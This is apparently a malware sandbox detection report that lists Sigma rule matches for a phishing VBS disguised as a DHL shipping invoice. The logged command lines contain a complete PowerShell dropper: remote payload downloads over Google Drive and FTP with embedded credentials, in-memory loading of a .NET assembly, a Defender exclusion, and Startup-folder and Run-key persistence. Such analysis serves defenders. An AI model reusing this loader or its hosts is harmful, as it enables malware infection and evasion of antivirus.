'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + 'nAGoAZw' + [char]66 + 'mAHoAJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, CommandLine: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ylfyq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ylfyq = ($ylfyq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$ylfyq = ($ylfyq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$mjnby = (New-Object Net.WebClient);$mjnby.Encoding = [System.Text.Encoding]::UTF8;$mjnby.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$zfgjg.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $zfgjg.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$zfgjg.dispose();$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $zfgjg.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.cnisms/cangoc/snigulp/tnetnoc-pw/rb.moc.igelebs//:ptth' , $huUPX , 'D D1D' ) );};", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1436, ParentProcessName: powershell.exe, ProcessCommandLine: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, ProcessId: 2804, ProcessName: powershell.exe
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs", ProcessId: 1632, ProcessName: wscript.exe
                      Source: Process startedAuthor: frack113: Data: Command: powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x2.ps1", CommandLine: powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x2.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ylfyq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ylfyq = ($ylfyq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$ylfyq = ($ylfyq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$mjnby = (New-Object Net.WebClient);$mjnby.Encoding = [System.Text.Encoding]::UTF8;$mjnby.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$zfgjg.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $zfgjg.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$zfgjg.dispose();$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $zfgjg.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.cnisms/cangoc/snigulp/tnetnoc-pw/rb.moc.igelebs//:ptth' , $huUPX , 'D D1D' ) );};", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1436, ParentProcessName: powershell.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x2.ps1", ProcessId: 5836, ProcessName: powershell.exe
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1' ";exit, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5836, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_ppc
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ylfyq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ylfyq = ($ylfyq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$ylfyq = ($ylfyq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$mjnby = (New-Object Net.WebClient);$mjnby.Encoding = [System.Text.Encoding]::UTF8;$mjnby.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$zfgjg.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $zfgjg.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$zfgjg.dispose();$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $zfgjg.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.cnisms/cangoc/snigulp/tnetnoc-pw/rb.moc.igelebs//:ptth' , $huUPX , 'D D1D' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ylfyq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ylfyq = ($ylfyq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$ylfyq = ($ylfyq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$mjnby = (New-Object Net.WebClient);$mjnby.Encoding = [System.Text.Encoding]::UTF8;$mjnby.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertif
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: Data: Command: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1' ";exit, CommandLine: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1' ";exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1' ";exit, ProcessId: 7392, ProcessName: cmd.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ylfyq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ylfyq = ($ylfyq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$ylfyq = ($ylfyq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$mjnby = (New-Object Net.WebClient);$mjnby.Encoding = [System.Text.Encoding]::UTF8;$mjnby.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$zfgjg.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $zfgjg.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$zfgjg.dispose();$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $zfgjg.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.cnisms/cangoc/snigulp/tnetnoc-pw/rb.moc.igelebs//:ptth' , $huUPX , 'D D1D' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ylfyq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ylfyq = ($ylfyq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$ylfyq = ($ylfyq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$mjnby = (New-Object Net.WebClient);$mjnby.Encoding = [System.Text.Encoding]::UTF8;$mjnby.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertif
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, CommandLine: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ylfyq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ylfyq = ($ylfyq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$ylfyq = ($ylfyq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$mjnby = (New-Object Net.WebClient);$mjnby.Encoding = [System.Text.Encoding]::UTF8;$mjnby.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$zfgjg.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $zfgjg.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$zfgjg.dispose();$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $zfgjg.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.cnisms/cangoc/snigulp/tnetnoc-pw/rb.moc.igelebs//:ptth' , $huUPX , 'D D1D' ) );};", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1436, ParentProcessName: powershell.exe, ProcessCommandLine: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, ProcessId: 2804, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ylfyq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ylfyq = ($ylfyq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$ylfyq = ($ylfyq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$mjnby = (New-Object Net.WebClient);$mjnby.Encoding = [System.Text.Encoding]::UTF8;$mjnby.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$zfgjg.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $zfgjg.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$zfgjg.dispose();$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $zfgjg.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.cnisms/cangoc/snigulp/tnetnoc-pw/rb.moc.igelebs//:ptth' , $huUPX , 'D D1D' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ylfyq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ylfyq = ($ylfyq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$ylfyq = ($ylfyq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$mjnby = (New-Object Net.WebClient);$mjnby.Encoding = [System.Text.Encoding]::UTF8;$mjnby.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertif
                      Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\uxrsw.ps1' ";exit, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5836, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_ppc
                      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ylfyq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ylfyq = ($ylfyq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$ylfyq = ($ylfyq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$mjnby = (New-Object Net.WebClient);$mjnby.Encoding = [System.Text.Encoding]::UTF8;$mjnby.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$zfgjg.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $zfgjg.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$zfgjg.dispose();$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $zfgjg.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.cnisms/cangoc/snigulp/tnetnoc-pw/rb.moc.igelebs//:ptth' , $huUPX , 'D D1D' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ylfyq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ylfyq = ($ylfyq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$ylfyq = ($ylfyq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$mjnby = (New-Object Net.WebClient);$mjnby.Encoding = [System.Text.Encoding]::UTF8;$mjnby.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertif
                      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs", ProcessId: 1632, ProcessName: wscript.exe
